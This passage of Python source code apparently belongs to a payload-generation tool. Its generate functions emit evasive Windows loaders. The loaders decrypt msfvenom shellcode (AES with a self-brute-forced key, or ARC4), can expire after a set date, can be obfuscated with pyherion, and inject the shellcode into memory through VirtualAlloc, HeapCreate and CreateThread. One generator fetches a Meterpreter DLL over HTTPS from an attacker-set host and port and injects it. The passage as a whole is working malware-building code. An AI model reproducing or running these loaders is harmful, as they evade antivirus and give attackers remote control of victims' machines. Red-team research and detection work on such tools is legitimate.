            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
            PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
            PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += '\t' + RandShellcode + '()'
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + 
known_plaintext_string + '\':\n' PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = 
helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + 
RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from 
Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n' PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if 
self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode 
+= '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n' PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode 
Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t' + 
RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += '\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code 
PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += '\t\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t\t\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n" # randomize everything, yo' sumMethodName = helpers.randomString() checkinMethodName = helpers.randomString() randLettersName = helpers.randomString() randLetterSubName = helpers.randomString() randBaseName = helpers.randomString() downloadMethodName = helpers.randomString() hostName = helpers.randomString() portName = helpers.randomString() requestName = helpers.randomString() responseName = helpers.randomString() injectMethodName = helpers.randomString() dataName = helpers.randomString() byteArrayName = helpers.randomString() ptrName = helpers.randomString() bufName = helpers.randomString() handleName = helpers.randomString() data2Name = helpers.randomString() # helper method that returns the sum of all ord values in a string % 0x100 payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName) payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName) payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName) payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName) payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName) payloadCode += "\t%s = httplib.HTTPSConnection(%s, %s)\n" %(requestName, hostName, portName) payloadCode += "\t%s.request(\"GET\", \"/\" + %s() )\n" %(requestName, checkinMethodName) payloadCode += "\t%s = %s.getresponse()\n" %(responseName, requestName) payloadCode += "\tif 
%s.status == 200: return %s.read()\n" %(responseName, responseName) payloadCode += "\telse: return \"\"\n" # method to inject a reflective .dll into memory payloadCode += "def %s(%s):\n" %(injectMethodName, dataName) payloadCode += "\tif %s != \"\":\n" %(dataName) payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName) payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName) payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName) payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName) payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName) payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName) # download the metpreter .dll and inject it payloadCode += "%s = ''\n" %(data2Name) payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payloadCode += "%s(%s)\n" %(injectMethodName, data2Name) if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = 
encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 
'\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'from ctypes import *\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', 
CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' 